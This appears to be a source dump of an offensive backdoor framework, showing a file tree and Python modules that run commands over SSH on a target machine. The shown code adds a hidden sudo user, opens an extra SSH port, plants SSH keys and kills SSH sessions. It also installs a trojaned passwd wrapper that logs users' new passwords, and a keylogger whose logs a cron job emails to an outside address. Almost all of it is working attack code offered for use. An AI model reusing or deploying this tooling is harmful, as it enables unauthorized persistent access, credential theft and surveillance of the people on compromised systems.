├── .gitignore ├── .travis.yml ├── LICENSE ├── README.md ├── backdoors ├── __init__.py ├── access │ ├── remove_ssh.py │ ├── ssh_key.py │ └── ssh_port.py ├── auxiliary │ ├── __password │ │ ├── pass1 │ │ ├── pass2 │ │ └── passwd │ ├── __web │ │ └── install.sh │ ├── append.py │ ├── immutable.py │ ├── keylogger.py │ ├── listen.py │ ├── option.py │ ├── password.py │ ├── simplehttp.py │ ├── user.py │ └── web.py ├── backdoor.py ├── connection.py ├── escalation │ ├── setuid.py │ └── shell.py ├── option.py ├── shell │ ├── __pupy │ │ ├── .gitignore │ │ ├── LICENSE │ │ ├── README.md │ │ ├── client │ │ │ ├── additional_imports.py │ │ │ ├── build_library_helper.py │ │ │ ├── reverse_ssl.py │ │ │ └── sources │ │ │ │ ├── GetProcAddressR.c │ │ │ │ ├── GetProcAddressR.h │ │ │ │ ├── LICENSES.txt │ │ │ │ ├── LoadLibraryR.c │ │ │ │ ├── LoadLibraryR.h │ │ │ │ ├── Makefile │ │ │ │ ├── MemoryModule.c │ │ │ │ ├── MemoryModule.h │ │ │ │ ├── MyLoadLibrary.c │ │ │ │ ├── MyLoadLibrary.h │ │ │ │ ├── Python-dynload.c │ │ │ │ ├── Python-dynload.h │ │ │ │ ├── Python-version.h │ │ │ │ ├── ReflectiveDllInjection.h │ │ │ │ ├── ReflectiveLoader.c │ │ │ │ ├── ReflectiveLoader.h │ │ │ │ ├── _memimporter.c │ │ │ │ ├── actctx.c │ │ │ │ ├── actctx.h │ │ │ │ ├── base_dispatch.c │ │ │ │ ├── base_inject.c │ │ │ │ ├── base_inject.h │ │ │ │ ├── gen_library_compressed_string.py │ │ │ │ ├── gen_python_bootloader.py │ │ │ │ ├── gen_resource_header.py │ │ │ │ ├── import-tab.c │ │ │ │ ├── import-tab.h │ │ │ │ ├── list.c │ │ │ │ ├── list.h │ │ │ │ ├── main_exe.c │ │ │ │ ├── main_reflective.c │ │ │ │ ├── makex64.bat │ │ │ │ ├── makex86.bat │ │ │ │ ├── mktab.py │ │ │ │ ├── pupy.c │ │ │ │ ├── pupy_load.c │ │ │ │ ├── pupy_load.h │ │ │ │ ├── remote_thread.c │ │ │ │ ├── remote_thread.h │ │ │ │ ├── resource_python_manifest.c │ │ │ │ ├── resources │ │ │ │ ├── iter_files.py │ │ │ │ └── library_patches │ │ │ │ │ └── uuid.py │ │ │ │ ├── thread.c │ │ │ │ └── thread.h │ │ ├── pupy.py │ │ ├── pupy │ │ │ ├── crypto │ │ │ │ ├── cert.pem │ │ │ │ ├── gen.sh │ │ │ │ └── server.pem │ │ │ ├── modules │ │ │ │ ├── __init__.py │ │ │ │ ├── download.py │ │ │ │ ├── exit.py │ │ │ │ ├── get_info.py │ │ │ │ ├── getprivs.py │ │ │ │ ├── interactive_shell.py │ │ │ │ ├── keylogger.py │ │ │ │ ├── memory_exec.py │ │ │ │ ├── migrate.py │ │ │ │ ├── mouselogger.py │ │ │ │ ├── msgbox.py │ │ │ │ ├── persistence.py │ │ │ │ ├── portfwd.py │ │ │ │ ├── process_kill.py │ │ │ │ ├── ps.py │ │ │ │ ├── pyexec.py │ │ │ │ ├── pyshell.py │ │ │ │ ├── screenshot.py │ │ │ │ ├── search.py │ │ │ │ ├── shell_exec.py │ │ │ │ ├── shellcode_exec.py │ │ │ │ ├── socks5proxy.py │ │ │ │ ├── upload.py │ │ │ │ └── webcamsnap.py │ │ │ ├── packages │ │ │ │ ├── all │ │ │ │ │ ├── interactive_shell.py │ │ │ │ │ ├── pupyimporter.py │ │ │ │ │ └── pupyutils │ │ │ │ │ │ ├── __init__.py │ │ │ │ │ │ └── search.py │ │ │ │ ├── src │ │ │ │ │ ├── VideoCapture │ │ │ │ │ │ ├── LGPL.txt │ │ │ │ │ │ └── src │ │ │ │ │ │ │ ├── VideoCapture.py │ │ │ │ │ │ │ ├── fixhtml.py │ │ │ │ │ │ │ ├── helvB08.pil │ │ │ │ │ │ │ ├── helvB08.png │ │ │ │ │ │ │ ├── helvetica-10.pil │ │ │ │ │ │ │ ├── helvetica-10.png │ │ │ │ │ │ │ ├── mkdist.py │ │ │ │ │ │ │ ├── vidcap.dsp │ │ │ │ │ │ │ ├── vidcap.dsw │ │ │ │ │ │ │ └── vidcapmodule.cpp │ │ │ │ │ └── pupymemexec │ │ │ │ │ │ ├── in-mem-exe.c │ │ │ │ │ │ ├── make.bat │ │ │ │ │ │ ├── makex64.bat │ │ │ │ │ │ └── pupymemexec.c │ │ │ │ └── windows │ │ │ │ │ ├── all │ │ │ │ │ └── pupwinutils │ │ │ │ │ │ ├── __init__.py │ │ │ │ │ │ ├── keylogger.py │ │ │ │ │ │ ├── memexec.py │ │ │ │ │ │ ├── mouselogger.py │ │ │ │ │ │ ├── msgbox.py │ │ │ │ │ │ ├── persistence.py │ │ │ │ │ │ ├── processes.py │ │ │ │ │ │ ├── screenshot.py │ │ │ │ │ │ ├── security.py │ │ │ │ │ │ └── shellcode.py │ │ │ │ │ ├── amd64 │ │ │ │ │ ├── psutil │ │ │ │ │ │ ├── __init__.py │ │ │ │ │ │ ├── _common.py │ │ │ │ │ │ ├── _compat.py │ │ │ │ │ │ ├── _psbsd.py │ │ │ │ │ │ ├── _pslinux.py │ │ │ │ │ │ ├── _psosx.py │ │ │ │ │ │ ├── _psposix.py │ │ │ │ │ │ ├── _pssunos.py │ │ │ │ │ │ ├── _psutil_windows.pyd │ │ │ │ │ │ └── _pswindows.py │ │ │ │ │ ├── pupymemexec.pyd │ │ │ │ │ └── vidcap.pyd │ │ │ │ │ └── x86 │ │ │ │ │ ├── psutil │ │ │ │ │ ├── __init__.py │ │ │ │ │ ├── _common.py │ │ │ │ │ ├── _compat.py │ │ │ │ │ ├── _psbsd.py │ │ │ │ │ ├── _pslinux.py │ │ │ │ │ ├── _psosx.py │ │ │ │ │ ├── _psposix.py │ │ │ │ │ ├── _pssunos.py │ │ │ │ │ ├── _psutil_windows.pyd │ │ │ │ │ └── _pswindows.py │ │ │ │ │ └── vidcap.pyd │ │ │ ├── pupy.conf │ │ │ ├── pupygen.py │ │ │ ├── pupylib │ │ │ │ ├── PupyClient.py │ │ │ │ ├── PupyCmd.py │ │ │ │ ├── PupyCompleter.py │ │ │ │ ├── PupyErrors.py │ │ │ │ ├── PupyJob.py │ │ │ │ ├── PupyModule.py │ │ │ │ ├── PupyServer.py │ │ │ │ ├── PupyService.py │ │ │ │ ├── PythonCompleter.py │ │ │ │ ├── __init__.py │ │ │ │ └── utils │ │ │ │ │ ├── __init__.py │ │ │ │ │ ├── network.py │ │ │ │ │ ├── pe.py │ │ │ │ │ └── rpyc_utils.py │ │ │ └── pupysh.py │ │ └── rpyc │ │ │ ├── __init__.py │ │ │ ├── core │ │ │ ├── __init__.py │ │ │ ├── async.py │ │ │ ├── brine.py │ │ │ ├── channel.py │ │ │ ├── consts.py │ │ │ ├── netref.py │ │ │ ├── protocol.py │ │ │ ├── reactor.py │ │ │ ├── service.py │ │ │ ├── stream.py │ │ │ └── vinegar.py │ │ │ ├── experimental │ │ │ ├── __init__.py │ │ │ ├── retunnel.py │ │ │ └── splitbrain.py │ │ │ ├── utils │ │ │ ├── __init__.py │ │ │ ├── authenticators.py │ │ │ ├── classic.py │ │ │ ├── factory.py │ │ │ ├── helpers.py │ │ │ ├── registry.py │ │ │ ├── server.py │ │ │ ├── teleportation.py │ │ │ └── zerodeploy.py │ │ │ └── version.py │ ├── __x86 │ │ ├── Cback.c │ │ └── x86 │ ├── bash.py │ ├── bash2.py │ ├── bind │ │ └── netcat_traditional.py │ ├── java.py │ ├── metasploit.py │ ├── netcat.py │ ├── netcat_traditional.py │ ├── perl.py │ ├── php.py │ ├── pyth.py │ ├── ruby.py │ ├── sh.py │ ├── sh2.py │ ├── web.py │ └── x86.py ├── template.py └── windows │ └── windows.py ├── dependencies.py ├── listen.py ├── master.py ├── modules ├── __init__.py ├── addUser.py ├── cron.py ├── module.py ├── option.py ├── poison.py ├── startup.py ├── template.py ├── web │ ├── env1 │ ├── env2 │ ├── envvars │ └── install.sh ├── webMod.py └── whitelist.py ├── requirements.txt ├── target.py └── tests ├── incomplete ├── containers.py ├── stats.py └── test.py └── tests.py /.gitignore: -------------------------------------------------------------------------------- 1 | # Compiled source # 2 | ################### 3 | *.com 4 | *.class 5 | *.dll 6 | *.exe 7 | *.o 8 | *.so 9 | *.pyc 10 | 11 | # Packages # 12 | ############ 13 | # it's better to unpack these files and commit the raw source 14 | # git has its own built in compression methods 15 | *.7z 16 | *.dmg 17 | *.gz 18 | *.iso 19 | *.jar 20 | *.rar 21 | *.tar 22 | *.zip 23 | 24 | # Logs and databases # 25 | ###################### 26 | *.log 27 | *.sql 28 | *.sqlite 29 | 30 | # OS generated files # 31 | ###################### 32 | .DS_Store 33 | .DS_Store? 34 | ._* 35 | .Spotlight-V100 36 | .Trashes 37 | ehthumbs.db 38 | Thumbs.db 39 | 40 | # Other files # 41 | ############### 42 | .idea/ 43 | __pycache__/ 44 | env/ 45 | -------------------------------------------------------------------------------- /.travis.yml: -------------------------------------------------------------------------------- 1 | language: python 2 | python: 3 | - "3.5" 4 | install: 5 | - pip install -r requirements.txt 6 | script: nosetests -s -vv tests/tests.py --nocapture --exclude-dir="tests/incomplete" 7 | -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | The MIT License (MIT) 2 | 3 | Copyright (c) 2016 Kkevsterrr 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | -------------------------------------------------------------------------------- /backdoors/__init__.py: -------------------------------------------------------------------------------- 1 | from .backdoor import * 2 | ''' 3 | from os.path import dirname, basename, isfile 4 | import glob 5 | modules = glob.glob(dirname(__file__)+"/*.py") 6 | __all__ = [ basename(f)[:-3] for f in modules if isfile(f)] 7 | 8 | from metasploit import * 9 | from netcat import * 10 | from netcat_traditional import * 11 | from perl import * 12 | from pyth import * 13 | from pupy import * 14 | from bash import * 15 | from bash2 import * 16 | from web import * 17 | from user import * 18 | from php import * 19 | from setuid import * 20 | from ssh_key import * 21 | from windows import * 22 | enabled_backdoors = {"user" : User, "bash" : Bash, "bash2" : Bash2, "metasploit" : Metasploit, "netcat" : Netcat, "nct" : Netcat_Traditional, "perl" : Perl, "python" : Pyth, "pupy" : Pupy, "web" : Web, "php": Php, "setuid" : Setuid, "sshkey" : SSHKey, "windows": Windows } 23 | ''' 24 | -------------------------------------------------------------------------------- /backdoors/access/remove_ssh.py: -------------------------------------------------------------------------------- 1 | from backdoors.backdoor import * 2 | 3 | class Remove_ssh(Backdoor): 4 | prompt = Fore.RED + "(remove_ssh)" + Fore.BLUE + ">> " + Fore.RESET 5 | 6 | def __init__(self, core): 7 | cmd.Cmd.__init__(self) 8 | self.intro = GOOD + "Using remove_ssh module..." 9 | self.core = core 10 | self.options = { #~Input extra options. You almost always need a port.~ 11 | "killall" : Option("killall", False, "Kills all ssh connections", True), 12 | "server" : Option("server", True, "Kills ssh server", True), 13 | } 14 | self.allow_modules = False 15 | self.modules = {} 16 | self.help_text = "Removes ssh on the target." 17 | 18 | def get_command(self): 19 | return str("echo " + self.core.curtarget.pword + " | sudo -S apt-get -y purge openssh-server") 20 | def do_exploit(self, args): 21 | if self.get_value("server")==True: 22 | self.core.curtarget.ssh.exec_command(self.get_command()) 23 | if self.get_value("killall")==str(True) or self.get_value("killall")==str(1): 24 | newstr=str("echo " + self.core.curtarget.pword + " | sudo -S ps -ef | grep sshd | grep -v root | grep -v \'{pstree -p | grep cut | cut -d\( -f3 | cut -d\) -f1}\' | grep -v grep | awk \'{print \"kill -9\", $2}\' | sh") 25 | print(newstr) 26 | self.core.curtarget.ssh.exec_command(newstr) 27 | print(GOOD + "Ssh removed.") 28 | -------------------------------------------------------------------------------- /backdoors/access/ssh_key.py: -------------------------------------------------------------------------------- 1 | from backdoors.backdoor import * 2 | 3 | class SSHKey(Backdoor): 4 | prompt = Fore.RED + "(sshkey) " + Fore.BLUE + ">> " + Fore.RESET 5 | 6 | def __init__(self, core): 7 | cmd.Cmd.__init__(self) 8 | self.intro = GOOD + "Using ssh keys backdoor..." 9 | self.core = core 10 | self.options = { 11 | } 12 | self.allow_modules = False 13 | self.help_text = INFO + "The SetUID backdoor works by setting the setuid bit on a binary while the user has root acccess, so that when that binary is later run by a user without root access, the binary is executed with root access.\n" + INFO +"By default, this backdoor flips the setuid bit on nano, so that if root access is ever lost, the attacker can SSH back in as an unpriviledged user and still be able to run nano (or any binary) as root. ('nano /etc/shadow')." 14 | 15 | def get_command(self): 16 | return "echo " + self.core.curtarget.pword + " | sudo -S chmod u+s %s" % (self.get_value("program")) 17 | 18 | def do_exploit(self, args): 19 | port = self.get_value("port") 20 | target = self.core.curtarget 21 | print(GOOD + "Initializing backdoor...") 22 | target.ssh.exec_command("echo -e \"\n\n\n\" | ssh-keygen -t rsa") 23 | os.system("ssh-copy-id " + target.uname + "@" + target.hostname) 24 | #os.system("sshpass -p %s ssh-copy-id %s@%s" % (t.pword, t.uname, t.hostname)) 25 | print(GOOD + "Added SSH keys to target.") 26 | -------------------------------------------------------------------------------- /backdoors/access/ssh_port.py: -------------------------------------------------------------------------------- 1 | from backdoors.backdoor import * 2 | 3 | class Ssh_port(Backdoor): 4 | prompt = Fore.RED + "(ssh_port)" + Fore.BLUE + ">> " + Fore.RESET 5 | 6 | def __init__(self, core): 7 | cmd.Cmd.__init__(self) 8 | self.intro = GOOD + "Using ssh_port module..." 9 | self.core = core 10 | self.options = { #~Input extra options. You almost always need a port.~ 11 | "port": Option("port", 53932, "Port to add ssh to", True), 12 | } 13 | self.allow_modules = True 14 | self.modules = {} 15 | self.help_text = "Adds ssh to an additional port." 16 | 17 | def get_command(self): 18 | return str("echo " + self.core.curtarget.pword + " | sudo -S chmod 777 /etc/ssh/sshd_config;" + " echo " + self.core.curtarget.pword + " | sudo -S echo \"Port " + str(self.get_value("port")) + "\" >> /etc/ssh/sshd_config; echo " + self.core.curtarget.pword + " | sudo -S chmod 611 /etc/ssh/sshd_config; echo " + self.core.curtarget.pword + " | sudo -S service sshd restart") 19 | 20 | def do_exploit(self, args): 21 | self.core.curtarget.ssh.exec_command(self.get_command()) 22 | print("Backdoor attempted. You can access this backdoor with ssh " + self.core.curtarget.uname + "@" + self.core.curtarget.hostname + " -p " + str(self.get_value("port"))) 23 | print(GOOD + "Module success") 24 | -------------------------------------------------------------------------------- /backdoors/auxiliary/__password/pass1: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | PASSWORD_PATH="/usr/bin/passwd" 4 | LOG_PATH=" 5 | -------------------------------------------------------------------------------- /backdoors/auxiliary/__password/pass2: -------------------------------------------------------------------------------- 1 | " 2 | 3 | if ! [ -t 0 ]; then 4 | STDIN=$(cat) 5 | fi 6 | 7 | USER="" 8 | for ARG in "$@"; do 9 | 10 | OUT=$(echo "$ARG" | grep "^-") 11 | if [ "$OUT" != "" ]; then 12 | PASSTHROUGH=true 13 | else 14 | if [ "$USER" == "" ]; then 15 | USER="$ARG" 16 | else 17 | PASSTHROUGH=true 18 | fi 19 | fi 20 | done 21 | 22 | if [ "$PASSTHROUGH" = true ]; then 23 | $PASSWORD_PATH "$@" 24 | exit $? 25 | fi 26 | 27 | if [ "$USER" == "" ]; then 28 | USER="root" 29 | else 30 | #Verify User 31 | id -u "$USER" > /dev/null 2>&1 32 | EXISTS=$? 33 | if [ $EXISTS -eq 1 ]; then 34 | #User does not exist 35 | $PASSWORD_PATH "$USER" 36 | exit $? 37 | fi 38 | fi 39 | 40 | if [ "$STDIN" == "" ]; then 41 | read -s -p "Enter new UNIX password: " PASS 42 | echo "" 43 | read -s -p "Retype new UNIX password: " PASS_CONFIRM 44 | echo "" 45 | ACTUAL_OUT=$((echo $PASS; echo $PASS_CONFIRM) | $PASSWORD_PATH $* 2>&1) 46 | EXIT_CODE=$? 47 | PROCESSED_OUT=$(echo "$ACTUAL_OUT" | cut -c52-) 48 | echo "$PROCESSED_OUT" 49 | else 50 | PASS=$(echo "$STDIN" | head -n1) 51 | ACTUAL_OUT=$(echo "$STDIN" | $PASSWORD_PATH "$@" 2>&1) 52 | EXIT_CODE=$? 53 | echo "$ACTUAL_OUT" 54 | fi 55 | 56 | if [ $EXIT_CODE -eq 0 ]; then 57 | echo "$(date) : $USER : $PASS" >> $LOG_PATH 58 | fi 59 | 60 | exit $EXIT_CODE 61 | -------------------------------------------------------------------------------- /backdoors/auxiliary/__password/passwd: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | PASSWORD_PATH="/usr/bin/passwd" 4 | LOG_PATH="/passwords.txt" 5 | 6 | if ! [ -t 0 ]; then 7 | STDIN=$(cat) 8 | fi 9 | 10 | USER="" 11 | for ARG in "$@"; do 12 | 13 | OUT=$(echo "$ARG" | grep "^-") 14 | if [ "$OUT" != "" ]; then 15 | PASSTHROUGH=true 16 | else 17 | if [ "$USER" == "" ]; then 18 | USER="$ARG" 19 | else 20 | PASSTHROUGH=true 21 | fi 22 | fi 23 | done 24 | 25 | if [ "$PASSTHROUGH" = true ]; then 26 | $PASSWORD_PATH "$@" 27 | exit $? 28 | fi 29 | 30 | if [ "$USER" == "" ]; then 31 | USER="root" 32 | else 33 | #Verify User 34 | id -u "$USER" > /dev/null 2>&1 35 | EXISTS=$? 36 | if [ $EXISTS -eq 1 ]; then 37 | #User does not exist 38 | $PASSWORD_PATH "$USER" 39 | exit $? 40 | fi 41 | fi 42 | 43 | if [ "$STDIN" == "" ]; then 44 | read -s -p "Enter new UNIX password: " PASS 45 | echo "" 46 | read -s -p "Retype new UNIX password: " PASS_CONFIRM 47 | echo "" 48 | ACTUAL_OUT=$((echo $PASS; echo $PASS_CONFIRM) | $PASSWORD_PATH $* 2>&1) 49 | EXIT_CODE=$? 50 | PROCESSED_OUT=$(echo "$ACTUAL_OUT" | cut -c52-) 51 | echo "$PROCESSED_OUT" 52 | else 53 | PASS=$(echo "$STDIN" | head -n1) 54 | ACTUAL_OUT=$(echo "$STDIN" | $PASSWORD_PATH "$@" 2>&1) 55 | EXIT_CODE=$? 56 | echo "$ACTUAL_OUT" 57 | fi 58 | 59 | if [ $EXIT_CODE -eq 0 ]; then 60 | echo "$(date) : $USER : $PASS" >> $LOG_PATH 61 | fi 62 | 63 | exit $EXIT_CODE 64 | -------------------------------------------------------------------------------- /backdoors/auxiliary/__web/install.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | yes | apt-get install --force-yes apache2 4 | yes | apt-get install --force-yes php5 5 | yes | apt-get install --force-yes libapache2-mod-php5 6 | yes | apt-get install --force-yes php5-cli 7 | mkdir /var/www/html 8 | -------------------------------------------------------------------------------- /backdoors/auxiliary/append.py: -------------------------------------------------------------------------------- 1 | from backdoors.backdoor import * 2 | 3 | class AppendOnly(Backdoor): 4 | prompt = Fore.RED + "(AppendOnly) " + Fore.BLUE + ">> " + Fore.RESET 5 | def __init__(self, core): 6 | cmd.Cmd.__init__(self) 7 | 8 | self.core = core 9 | self.intro = GOOD + "Using append auxiliary..." 10 | self.options = { 11 | "file": Option("file", "/bin/ls", "file to make append only", False), 12 | "function" : Option("function", "add", "add or remove append only flag", False) 13 | } 14 | self.help_text = INFO + "Sets (or removes) the append-only flag for any file on the system." 15 | self.allow_modules = False 16 | self.modules = {} 17 | 18 | def do_exploit(self, args): 19 | if self.get_value("function") == "remove": 20 | self.core.curtarget.ssh.exec_command("echo " + self.core.curtarget.pword + " | sudo -S chattr -a " + self.get_value("file")) 21 | else: 22 | self.core.curtarget.ssh.exec_command("echo " + self.core.curtarget.pword + " | sudo -S chattr +a " + self.get_value("file")) 23 | print(GOOD + "AppendOnly module executed.") 24 | -------------------------------------------------------------------------------- /backdoors/auxiliary/immutable.py: -------------------------------------------------------------------------------- 1 | from backdoors.backdoor import * 2 | 3 | class Immutable(Backdoor): 4 | prompt = Fore.RED + "(Immuteable) " + Fore.BLUE + ">> " + Fore.RESET 5 | def __init__(self, core): 6 | cmd.Cmd.__init__(self) 7 | 8 | self.core = core 9 | self.intro = GOOD + "Using immutable auxiliary..." 10 | self.options = { 11 | "file": Option("file", "/bin/ls", "file to make immutable", False), 12 | "function" : Option("function", "add", "add or remove immuteable flag", False) 13 | } 14 | self.help_text = INFO + "Sets (or removes) the immutable flag for any file on the system." 15 | self.allow_modules = False 16 | self.modules = {} 17 | 18 | def do_exploit(self, args): 19 | if self.get_value("function") == "remove": 20 | self.core.curtarget.ssh.exec_command("echo " + self.core.curtarget.pword + " | sudo -S chattr -i " + self.get_value("file")) 21 | else: 22 | self.core.curtarget.ssh.exec_command("echo " + self.core.curtarget.pword + " | sudo -S chattr +i " + self.get_value("file")) 23 | print(GOOD + "Immutable module executed.") 24 | -------------------------------------------------------------------------------- /backdoors/auxiliary/keylogger.py: -------------------------------------------------------------------------------- 1 | from backdoors.backdoor import * 2 | import os 3 | import time 4 | 5 | class Keylogger(Backdoor): 6 | prompt = Fore.RED + "(keylogger) " + Fore.BLUE + ">> " + Fore.RESET 7 | 8 | def __init__(self, core): 9 | cmd.Cmd.__init__(self) 10 | self.intro = GOOD + "Using keylogger auxiliary module" 11 | self.core = core 12 | self.options = { 13 | "email": Option("email", "False", "set to \"True\" to send reports over email", False), 14 | "address": Option("address", "example@example.com", "add email address", False), 15 | 16 | } 17 | self.allow_modules = True 18 | self.modules = {} 19 | self.help_text = INFO + "Installs logkeys and starts a listener, and gives the user the option to send the logs back to a specific email address." 20 | self.target = self.core.curtarget 21 | 22 | def get_command(self): 23 | self.target.ssh.exec_command("echo " + self.target.pword + " | sudo -S logkeys --start --output ~/log.log") 24 | 25 | def do_exploit(self, args): 26 | os.system('git clone https://github.com/kernc/logkeys') 27 | self.target.ssh.exec_command("echo " + self.target.pword + " | sudo -S rm -rf logkeys/") 28 | self.target.scpFiles(self, 'logkeys', True) 29 | self.target.ssh.exec_command("./logkeys/configure") 30 | time.sleep(10) 31 | print("Configuring...") 32 | self.target.ssh.exec_command("make logkeys") 33 | time.sleep(10) 34 | print("Making...") 35 | self.target.ssh.exec_command("echo " + self.target.pword + " | sudo -S make install logkeys") 36 | print("Installing...") 37 | time.sleep(10) 38 | self.target.ssh.exec_command("touch log.log") 39 | time.sleep(1) 40 | self.target.ssh.exec_command("echo " + self.target.pword + " | sudo -S logkeys --start --output ~/log.log") 41 | 42 | print("Starting...") 43 | 44 | if (self.get_value("email")): 45 | self.target.ssh.exec_command("echo " + self.target.pword + " | sudo -S apt-get install sendmail") 46 | self.target.ssh.exec_command("echo " + self.target.pword + " | sudo -S apt-get install mailutils") 47 | self.target.ssh.exec_command("crontab -l > mycron") 48 | self.target.ssh.exec_command("echo 'echo report | mail -A ~/log.log " + self.get_value("address") + "' > script.sh") 49 | self.target.ssh.exec_command("echo \"* * * * 0 echo password | sudo -S bash ~/script.sh\" >> mycron && crontab mycron && rm mycron") 50 | print("You will recieve an email(probably in spam) with your new keylogger report every hour.") 51 | for mod in self.modules.keys(): 52 | print(INFO + "Attempting to execute " + mod.name + " module...") 53 | mod.exploit(self.get_command()) 54 | 55 | -------------------------------------------------------------------------------- /backdoors/auxiliary/listen.py: -------------------------------------------------------------------------------- 1 | from backdoors.backdoor import * 2 | 3 | #First argument - port 4 | #Second argument - password 5 | #third - if it has a prompt or not, defaults to some (meaning it has a prompt) 6 | 7 | class Listen(Backdoor): 8 | prompt = Fore.RED + "(Listener) " + Fore.BLUE + ">> " + Fore.RESET 9 | 10 | def __init__(self, core): 11 | cmd.Cmd.__init__(self) 12 | self.intro = GOOD + "Using Listener module..." 13 | self.core = core 14 | self.options = { 15 | "port" : Option("port", 53923, "port to begin the listener on", True), 16 | "password": Option("password", "none", "password for the connection", True), 17 | "prompt": Option("prompt", "none", "prompt for the shell", True) 18 | } 19 | self.allow_modules = False 20 | self.modules = {} 21 | self.help_text = INFO + "Create a listener for a backdoor" 22 | 23 | def do_exploit(self, args): 24 | print(GOOD + "Initializing listener...") 25 | self.listen(str(self.get_value("password")), str(self.get_value("prompt"))) 26 | 27 | -------------------------------------------------------------------------------- /backdoors/auxiliary/option.py: -------------------------------------------------------------------------------- 1 | class Option(): 2 | 3 | def __init__(self, name, value, description, required): 4 | self.name = name 5 | self.value = value 6 | self.description = description 7 | self.required = required 8 | -------------------------------------------------------------------------------- /backdoors/auxiliary/password.py: -------------------------------------------------------------------------------- 1 | from backdoors.backdoor import * 2 | 3 | #courtesy of Cwenck (github.com/cwenck) 4 | 5 | class Password(Backdoor): 6 | prompt = Fore.RED + "(bash2) " + Fore.BLUE + ">> " + Fore.RESET 7 | 8 | def __init__(self, core): 9 | cmd.Cmd.__init__(self) 10 | self.intro = GOOD + "Using password module" 11 | self.core = core 12 | self.options = { 13 | "file" : Option("file", "/passwords.txt", "file to write the passwords to", True), 14 | "email" : Option("email", "", "email to send the passwords", True), #not supported yet 15 | } 16 | self.allow_modules = False 17 | self.modules = {} 18 | self.help_text = INFO + "Save all changed passwords to a file" 19 | 20 | def do_exploit(self, args): 21 | fileLoc = str(self.get_value("file")) 22 | toW = "backdoors/auxiliary/__password/passwd" 23 | stringToAdd = "" 24 | fileToWrite = open(toW, 'w') 25 | 26 | with open ("backdoors/auxiliary/__password/pass1", "r") as myfile: 27 | data=myfile.read() 28 | data = data[:-1]#remove the last new line character. 29 | stringToAdd+=data + fileLoc 30 | with open ("backdoors/auxiliary/__password/pass2", "r") as myfile: 31 | data=myfile.read() 32 | stringToAdd+=data 33 | fileToWrite.write(stringToAdd) 34 | fileToWrite.close() 35 | self.core.curtarget.scpFiles(self, 'backdoors/auxiliary/__password/passwd', False) 36 | self.core.curtarget.ssh.exec_command("echo " + self.core.curtarget.pword + " | sudo -S mv ~/passwd /usr/sbin") 37 | -------------------------------------------------------------------------------- /backdoors/auxiliary/simplehttp.py: -------------------------------------------------------------------------------- 1 | from backdoors.backdoor import * 2 | 3 | class SimpleHTTP(Backdoor): 4 | prompt = Fore.RED + "(SimpleHTTP) " + Fore.BLUE + ">> " + Fore.RESET 5 | 6 | def __init__(self, core): 7 | cmd.Cmd.__init__(self) 8 | self.intro = GOOD + "Using simple http auxiliary..." 9 | self.core = core 10 | self.options = { 11 | "port": Option("port", "8000", "port to serve up SimpleHTTPServer", False), 12 | } 13 | self.allow_modules = True 14 | self.modules = {} 15 | self.help_text = INFO + "Starts python's SimpleHTTP server on the client." 16 | 17 | def get_command(self): 18 | return ("nohup python -m SimpleHTTPServer %s &> /dev/null &" % self.get_value("port")) 19 | 20 | def do_exploit(self, args): 21 | target = self.core.curtarget 22 | print(GOOD + "Starting web server....") 23 | target.ssh.exec_command(self.get_command()) 24 | for mod in self.modules.keys(): 25 | print(INFO + "Attempting to execute " + mod.name + " module...") 26 | mod.exploit(self) 27 | 28 | -------------------------------------------------------------------------------- /backdoors/auxiliary/user.py: -------------------------------------------------------------------------------- 1 | from backdoors.backdoor import * 2 | 3 | class User(Backdoor): 4 | prompt = Fore.RED + "(user) " + Fore.BLUE + ">> " + Fore.RESET 5 | 6 | def __init__(self, core): 7 | cmd.Cmd.__init__(self) 8 | self.intro = GOOD + "Using add user auxiliary module" 9 | self.core = core 10 | self.options = { 11 | "name" : Option("name", "bob1234", "name of new user", True), 12 | "password" : Option("password", "password1234", "password of new user", True), 13 | } 14 | self.allow_modules = True 15 | self.modules = {} 16 | self.help_text = INFO + "Adds a new user to the target." 17 | 18 | def get_command(self): 19 | user = self.get_value("name") 20 | password = self.get_value("password") 21 | return ("echo " + self.core.curtarget.pword + " | sudo -S useradd -M -p $(openssl passwd -1 \""+ str(password) +"\") " + str(user) + "; echo " + self.core.curtarget.pword + " | sudo -S usermod -a -G sudo " + str(user)) 22 | 23 | def do_exploit(self, args): 24 | target = self.core.curtarget 25 | user = self.get_value("name") 26 | password = self.get_value("password") 27 | print(GOOD + "Creating user....") 28 | target.ssh.exec_command(self.get_command()) 29 | for mod in self.modules.keys(): 30 | print(INFO + "Attempting to execute " + mod.name + " module...") 31 | mod.exploit(self.get_command()) 32 | -------------------------------------------------------------------------------- /backdoors/auxiliary/web.py: -------------------------------------------------------------------------------- 1 | from backdoors.backdoor import * 2 | 3 | 4 | class Web(Backdoor): 5 | prompt = Fore.RED + "(web) " + Fore.BLUE + ">> " + Fore.RESET 6 | 7 | def __init__(self, core): 8 | cmd.Cmd.__init__(self) 9 | self.intro = GOOD + "Using web auxiliary module" 10 | self.core = core 11 | self.options = { 12 | } 13 | self.allow_modules = True 14 | self.enabled_modules = {} 15 | self.modules = {} 16 | self.help_text = INFO + "Installs and starts an apache web server on the client." 17 | 18 | def get_command(self): 19 | target = self.core.curtarget 20 | target.ssh.exec_command("echo " + target.pword + " | sudo -S bash ~/install.sh") 21 | 22 | def 